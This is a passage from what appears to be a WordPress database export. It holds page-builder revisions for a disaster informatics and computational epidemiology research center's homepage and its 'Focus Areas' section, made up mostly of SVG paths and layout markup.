d=\"M493.05,53.3c1.63-.29,3.58,1.17,5.41,1.83l-4,3,5.83-.32c-.77-1.85-1.34-3.24-1.91-4.62-2.49-1.88-5-1.26-8-1.06-5.54.37-11.23-1.28-16.85-2.09l0-1.24L484,46.55a47.15,47.15,0,0,0-23.08,2.63,88.07,88.07,0,0,0,12.06,2.33C479.62,52.26,486.13,54.53,493.05,53.3Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M617.52,33.74l-2.9,2.16c4.85.88,4.8.88,4.91,5.68a45.67,45.67,0,0,0,.64,4.92c.26.28.53.56.79.85.41-.65,1.2-1.31,1.17-1.94-.11-2.44.58-3.63,3.32-3.92,2.18-.23,2.73-3.36,1.31-5.25C624.32,33,621,33.28,617.52,33.74Z\" transform=\"translate(0 0)\"\n opacity=\"0.6\"></path>\n <path d=\"M592,35.75c.83.74.73,2.5,1.25,4.78,1.89-.85,4.3-1.41,5.94-2.85,1-.83.64-3.09.83-4.27l3.15-3.29c-1.79,0-3.4-.16-4.42,2.16-.47,1.08-3.12,2.2-4.26,1.8-2.61-.91-4.76-1.43-7.06.56-.25.21-1.44-.91-2.25-1a7.84,7.84,0,0,0-2.46.46,45.78,45.78,0,0,0,5.58,1.79C589.46,36.1,591.3,35.16,592,35.75Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M535,51.31h4.2l4,.53,6.14.22,8.15,0c1.39-1.53,2.47-.9,3.44.5l-.07.12,2.68-.2c.05-.49.11-1,.16-1.47l-34.16-.94c.46.4.93.79,1.4,1.18Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M517.28,49.94l6.22.66,1.93.06L527.5,50l-19.06-2,1.41,1.82Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M597.32,44.41c-3.3.19-6.6.39-9.89.64-.23,0-.43.47-.64.73,2.5,2.16,7.06,1.78,11-.9C597.6,44.72,597.45,44.41,597.32,44.41Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M495.61,47.63c3.15.56,6.32,1.11,9.5,1.46.62.07,1.34-.72,2-1.11l-12.29-1.33C495.09,47,495.3,47.57,495.61,47.63Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M565,50.56c3.78-.16,7.57-.31,11.36-.5.1,0,.18-.37.28-.56C572.61,48.09,568.66,47.69,565,50.56Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1057.93,47.77c.24-1.13.47-2.26.71-3.39l-4.88,3.36,2.17.72Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M599,45.28c1.41,1,3.57.47,5.53-1.37C602.08,41.91,601,45.43,599,45.28Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1121.39,64.36l-2.2,0C1119.91,65.91,1120.64,65.94,1121.39,64.36Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M526.91,66.87l2.61.91,2.14,1.15,2,1.82,1.4-.44,2-1.44a1.48,1.48,0,0,1,.19-.57l.66-6.21a1.43,1.43,0,0,1-.16-.57l-4.71.66-1,.27-1.9,2.76c-.82-2.42-1.29-3.8-1.75-5.17l-.05-.07C524.76,61.66,526.48,64.39,526.91,66.87Z\" transform=\"translate(0 0)\"\n opacity=\"0.6\"></path>\n <path d=\"M699.28,46.12c3.9.2,5-.72,5.5-4.49l-.82-.25C701.9,42.43,699.31,43,699.28,46.12Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M637.78,32.05q-.85,2.46-1.7,4.92c1.48-2,3-1.49,4.48,0L642,34.88c0-.45,0-.9,0-1.35Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M18.44,71.94c-.93-2.4-3-4.37-4.54-6.54.79,2.21-6.73-1-13.9-4.05v8.19C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M227.49,59.55a14.62,14.62,0,0,1,5.39.15c3.79.67,7.5,2,11.3,2.29,7.86.56,15.75.58,23.63.85,1.79.06,3.59.2,5.36.43,2.28.29,4.53.71,6.79,1.08a25.57,25.57,0,0,1,3.07-.78c3.39-.47,6.81-.78,10.2-1.29,2.15-.33,2.83.77,3,2.6l1.31.32c5.86-3.59,12-2.37,18.3-1.54a78,78,0,0,1,15.47,4.16c2.66.92,6.07-.34,9.15-.61-.14-.18-.28-.52-.4-.51-5.7.44-11.06-.46-15.85-3.8-.08-.06-.22,0-.33,0-6.14-.46-12.22-1.2-17.88-3.9a4.73,4.73,0,0,0-2.35-.15c-4.42.5-8.83,1.16-13.27,1.57-3.8.35-6-1.15-7.51-4.46-.28-.61-1.05-1.43-1.54-1.4a2.21,2.21,0,0,0-1.5,1.47c-.38,1.81-.48,3.69-.76,6.12-2.94-.82-5.8-1.2-8.24-2.42-2.13-1.07-3.35-.79-5.11.57-1.29,1-3.9,2.11-4.71,1.52-2.88-2.1-5.68-1.35-8.74-1.16s-6-.46-9-.87c-1.75-.25-3.45-.88-5.2-1.13-5.63-.81-11.27-1.61-16.92-2.21-1.55-.16-3.18.41-4.77.64C219.93,58.68,223.34,60.44,227.49,59.55Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M107.68,50.62,109,50l1.34-.16h1.37l3.38.24,7.53.69c3.79-.37,7.58-.94,11.38-1,2.78-.09,5.59.74,8.37.6,4.39-.2,8.66-.6,12.82,1.52,1.39.71,3.31.41,5,.5,5.85.3,11.71.5,17.55.87,5.36.33,10.71.82,16.06,1.29,2,.17,4,.53,6,.67a12.84,12.84,0,0,0,2.58-.33c-3.2-.48-6.38-1.08-9.58-1.41-4-.42-8.2-.17-12.13-1-6.24-1.36-12.38-2.39-18.8-1.53a24.07,24.07,0,0,1-6.73-.53A4.51,4.51,0,0,1,152.65,49c-1.62-2-2.9-4.19-4.57-6.09a4.87,4.87,0,0,0-3.17-1.67c-.6,0-1.54,1.58-1.78,2.58-.85,3.6-2,4.58-5.7,3.95-3-.52-6.07-2.29-8.83.75-.3.32-1.29,0-2,0l-17.77,0c-2.55,0-5.1-.13-7.63.08s-4.86.75-7.29,1.15l11.69,1.71Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M360.25,69.74a19.45,19.45,0,0,0,14.27-2c.71-.37,1.78,0,2.68,0l6.27-.07,2.08-.58,1.19-.92,4.8-1.7c-1-1.37-1.64-3.69-3.93-1.23A12,12,0,0,1,385,64.85c-.33-1-.63-2-1-3a18.81,18.81,0,0,0-1.68-4.41,12,12,0,0,0-3.45-3.06c-1.13-.74-2.77-1.81-3.68-1.45s-1.92,2.22-2,3.47c-.16,3.27.3,6.5,4,8.14l-5.48,2.41L366,69.46l1.26-4.74c-4.21,3.49-8.38,3.43-12.54,2.69.26.7.53,1.4.79,2.09A18.31,18.31,0,0,1,360.25,69.74Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M348.81,67.74c2.05,1.76,4.37,1.82,6.69,1.76-.26-.69-.53-1.39-.79-2.09-1.83-.33-3.65-.78-5.48-1.14-.8-.15-1.81.75-2.73,1.16C347.29,67.52,348.32,67.32,348.81,67.74Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M398.14,57.66c-1.34,1.74-2.11,3.92-3.14,5.9l-.21.18.13.24,4.18-3.2,1.3-.76a16.63,16.63,0,0,0,1.42-3.64c.68-4.85,3.49-7,8.2-6.2.6.09,1.37-.88,2.06-1.36-.95-.27-1.94-.86-2.84-.74-3.33.45-5.75-.55-7.18-3.7a12.14,12.14,0,0,0-1.77-2.05c-2.86,6.11-7.58.56-11.51,2.26a21.74,21.74,0,0,0,5.76,3.5C400,50.22,401.48,53.3,398.14,57.66Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M18,59.82c-3.68-.16-5.72,1.74-4.66,4.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1345.25,39.33c.3,0,.55.88.77,1.37.58,1.23,1.13,2.47,1.69,3.7l2.78-5.82-7-6-.67.1C1342.29,35.36,1339.64,38.82,1345.25,39.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1348.71,56.82c1.07,2,1.79,1.74,3.33.61.7-.52,2.73-.57,3-.14,2.09,3.45,6.52,5.43,6.51,10.21a2.57,2.57,0,0,0,.77,1.48c4,4.4,9.59,5.64,14.78,7.72-2.36-2.43-1.84-7-6.08-8.1-.31-.08-.28-1.2-.54-1.77a4.87,4.87,0,0,0-1.22-2c-2.44-1.76-3.56-4.63-2.31-7.25.46-1,1.66-1.6,2.52-2.39a10.27,10.27,0,0,1,1.53,2.56c1.57,6.2,2.6,7.28,7.45,7.5l.09,5.57,1.23,0c.27-1.59.53-3.18,1-5.86,3.67,4.78,7.64,5.42,12,3.82.32-2.42.6-4.58.9-6.79l-2.77-.25c2.64-2.3,2.94-6.83,6.84-7.06-.26,2.92-.5,5.68-.78,8.8,1.51-.67,2.58-1.51,3-1.26,2.8,1.75,4.12.21,5.78-1.86,1.06-1.32,2.8-1.86,3.72.87.47,1.39,2.2,3.53,3,3.39a24.34,24.34,0,0,0,7.85-3c.78-.44.74-2.47.89-3.8s.12-2.9.17-4.35l-4.43-3.18-2.82,4.13c-2.88-.62-5.19-1.4-7.54-1.54s-5.25,1.11-7.38.33c-4-1.47-7.74-1.09-12.06.48a60.15,60.15,0,0,0-1.34-6.22,5,5,0,0,0-2-2.32,8.13,8.13,0,0,0-2.6-.63c-4.54-1.08-9-2-13.14,1.33a1.15,1.15,0,0,1-.59.32c-1,0-2.67.35-3-.14a5.71,5.71,0,0,1-.79-3.75,3,3,0,0,1,2.19-1.91c2.28,0,3.34-1.09,3-3.06s-1-4.09-3.92-3.47l1,2.41c-5.2,4-5.45,7-1.59,12.2a7.69,7.69,0,0,1,1.12,4.78,16.93,16.93,0,0,1-2,6.45c-.66-2.71-1.33-5.41-2.15-8.73a12.13,12.13,0,0,1-2,2.32c-.81.54-2,1.24-2.76,1-3.9-1.42-7.57-.73-11.24.69C1346.42,55.58,1348.18,55.86,1348.71,56.82ZM1375,55.71l3.17.95c1.82-1.8,2.31-3.65,1.13-6.07-.37-.74.35-2,.57-3,1,.58,2.29.94,3,1.79a45.93,45.93,0,0,1,3.11,5.31c-2.2,5.44-3.26,6.29-5.41,4.5l-3.89,2.24-2.7-4.92Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1429.65,59.51l3.06-1.52c.23,2.5-1.93,5,1.42,6.94l1.95-4.61,6.73,4.13,2.06-6c2.61,1.08,5.58,1.46,7.18,3.14,2.69,2.82,2.31,3.16,4.89.34a8.88,8.88,0,0,1,1.73-1.1c-.55,1.79-1,3.11-1.36,4.43l.72.38,3.19-1.9,2.57,3.17,3.38-4c2.19,1.56,3.36.64,4.3-1.57a3.45,3.45,0,0,1,2.45-1.77c.65,0,2,1.33,1.92,1.9-.14,1-1.18,1.76-1.85,2.62-.24.31-.52.58-.8.9,2.72,2.6,3.66-1,5.56-1.39l1.82,2.69c3.6-1.56,7.17-2.85,10.48-4.63,2.13-1.15,3.15-.7,4.45,1.1,1.48,2.05,3.51,3.51,7.27,3.65l-3.55-4.65a38.14,38.14,0,0,1,3.73,1.53c4.47,2.55,6.71,2,9.73-2.09a4.21,4.21,0,0,1,2.82-1.14,11.3,11.3,0,0,1,3,.6c1.52.3,3.49.1,4.44,1,.75.71.27,2.73.34,4.33a9.11,9.11,0,0,0,1.13-.48c4.42-2.68,5-2.61,8.87,1a3,3,0,0,0,5-1.65,28.62,28.62,0,0,0,.39-3.35c-1.18-.17-2.38-.28-3.54-.54-.94-.21-2.19-.33-2.69-1-2.81-3.64-7.42-3-11-4.73-.53-.25-1.77,1.16-2.76,1.63-1.19.56-2.6,1.53-3.68,1.29-4.88-1.06-6.15-.72-8.55,3.33l-5.16-.84c1.76-1.94,3.09-3.39,4.34-4.75-1.52-2.92-3.62-2.05-5-.87s-1.88,3.11-3,5.11c.11-3.16-.94-4.58-4.1-4.6-2.37,0-4.7-1.27-7.09-1.67a11.57,11.57,0,0,0-5,.06c-5.69,1.72-11.31,3.2-17.18.85a3.25,3.25,0,0,0-1.64-.14c-4.84.8-9.6,1-14.13-1.42a2.26,2.26,0,0,0-1.89-.12c-3.88,2.49-7.63,1.6-11.47-.11-.83-.37-2.19-.7-2.78-.29a4.61,4.61,0,0,1-5,.26c-1.55-.71-3.2-1.21-5.14-1.92-.25.81-.51,1.61-.76,2.42C1424.18,52.92,1427.59,55.41,1429.65,59.51Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1551.42,67.2c.56-1.29,1-2.54,1.61-3.69,1-1.93,4.37-2.72,5.42-1.28,2.92,4,7,4.8,11.86,4.8-.43-1.29-.75-2.21-1-3l5.34-4.25c2.54,2.71,4.76,5.31,7.28,7.57.67.61,2.35.44,3.42.14a5,5,0,0,0,1.9-1.28c1.89.52,3.92,1.38,4.11,1.08,1.62-2.56,5.43-3.51,5.47-7.21-2.48-.1-5.16-.84-7.4-.15-2.72.84-4.89.35-7.47-.28a38,38,0,0,0-9.55-.55c-2.6,0-5.18.76-7.78.85-3.25.12-6.57-.48-9.76,0-2.3.31-3.86.26-5.24-1.75a3.27,3.27,0,0,0-2.34-.91c-1.65,2.19-3.6,3.28-6.38,2.48-.1,0-.36.5-.55.77l1,6.9C1544.78,64.68,1547.93,65.4,1551.42,67.2Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1639.23,56.13l5,.11c2.64,6.34,6.6,11.29,14.84,10.85-.46,4.49,2,5.65,5.79,5.51,1.84-.07,3.7.16,5.55.25l1.69,4.38,1.21.06,1.76-.72c-.47-1-1-2-1.39-3-1.48-4-2.47-4.47-6.42-3.34a9.44,9.44,0,0,1-2.19.11c-.91-5.38-1.74-6.27-5-5.53-2.64.61-4-.91-3.32-3.67,1.13-4.46.57-5-4.39-5.07-2.74,0-5.27-.5-7-3.14-2.47-3.86-3.72-4.21-8.1-2.84l3.32,1.35Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1623.78,53.05c3.4-.23,6.83,0,10.11,0l2.21-3.28c-.78-.31-1.59-.93-2.34-.86-5,.43-10,1-15,1.55C1619.85,52.5,1621.42,53.22,1623.78,53.05Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1361.67,35.06c-2.1-.64-6.14,1-7,2.88C1357.09,37.24,1360.28,38.33,1361.67,35.06Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341,50.21l1.76,2.4c1.6-.91,3.2-1.81,4.8-2.73,1.29-.74,2.32-1.54.54-2.86l-6.89,2.85h0Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1339.42,50.35l1.6-.14.21-.34-1.82-.1Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n </svg>\n </div>\n <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-215 style-local-22-h27\">\n <!---->\n <!---->\n <h3 class=\"\">Center for Disaster Informatics & Computational Epidemiology</h3>\n </div>\n </div>\n <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Enabling Data-Driven Disaster Assessment & Planning\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"22-h29\" class=\"h-x-container style-677 style-local-22-h29 position-relative h-element\">\n <!---->\n <div class=\"h-x-container-inner style-dynamic-22-h29-group style-677-spacing style-local-22-h29-spacing\"><span class=\"h-button__outer style-678-outer style-local-22-h30-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"\" data-colibri-id=\"22-h30\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-678 style-local-22-h30 position-relative\"><!----><!----> <span>our mission</span></a>\n </span>\n </div>\n </div>\n <div data-colibri-id=\"22-h31\" class=\"h-x-container style-217 style-local-22-h31 position-relative h-element\">\n <!---->\n <div class=\"h-x-container-inner style-dynamic-22-h31-group style-217-spacing style-local-22-h31-spacing\"><span class=\"h-button__outer style-218-outer style-local-22-h32-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"/about/\" data-colibri-id=\"22-h32\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-218 style-local-22-h32 position-relative\"><!----><!----> <span>Learn More</span></a>\n </span>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h33-outer\">\n <div data-colibri-id=\"22-h33\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h33 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h34\" class=\"d-block style-221 style-local-22-h34 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h34-image\">\n <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h34-frameImage\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2022-04-29 09:16:29','2022-04-29 13:16:29','',22,'https://gsudice.dataconn.net/?p=1290',0,'revision','',0),(1294,1,'2022-04-29 09:17:36','2022-04-29 13:17:36','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"styleRef\":336,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c5\",\"parentId\":\"20-c3\",\"partialId\":20,\"styleRef\":337,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":335,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c7\",\"parentId\":\"20-c6\",\"partialId\":20,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"20-c7\",\"index\":0,\"id\":\"20-c8\",\"partialId\":20,\"styleRef\":334,\"type\":\"content\",\"props\":{\"content\":\"Focus Areas<br>\"}}],\"styleRef\":333,\"type\":\"content\"}],\"id\":\"20-c6\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":331,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c10\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c10\",\"index\":0,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c10\",\"index\":1,\"id\":\"20-c12\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease & disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c10\",\"index\":1,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c14\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c14\",\"index\":0,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c14\",\"index\":1,\"id\":\"20-c16\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c14\",\"index\":1,\"id\":\"20-c17\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c18\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c18\",\"index\":0,\"id\":\"20-c19\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c18\",\"index\":1,\"id\":\"20-c20\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"Impact assessment<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c18\",\"index\":1,\"id\":\"20-c21\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c9\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2022-04-29 09:17:36','2022-04-29 13:17:36','',168,'https://gsudice.dataconn.net/?p=1294',0,'revision','',0),(1295,1,'2022-04-29 09:17:36','2022-04-29 13:17:36','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-335 style-local-20-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-336-outer style-local-20-c4-outer\">\n <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-336 style-local-20-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-337-outer style-local-20-c5-outer\">\n <div data-colibri-id=\"20-c5\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-337 style-local-20-c5 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"20-c6\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-331 style-local-20-c6 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-333-outer style-local-20-c7-outer\">\n <div data-colibri-id=\"20-c7\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-333 style-local-20-c7 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c8\" class=\"h-global-transition-all h-heading style-334 style-local-20-c8 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-334 style-local-20-c8\">\n <!---->\n <!---->\n <h1 class=\"\">Focus Areas</h1>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"20-c9\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c9 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c10-outer\">\n <div data-colibri-id=\"20-c10\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c10 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c11\" class=\"h-icon style-274 style-local-20-c11 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c11-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\"><path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c12\" class=\"h-global-transition-all h-heading style-275 style-local-20-c12 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c12\">\n <!---->\n <!---->\n <h5 class=\"\">disease & disaster modeling</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c13\" 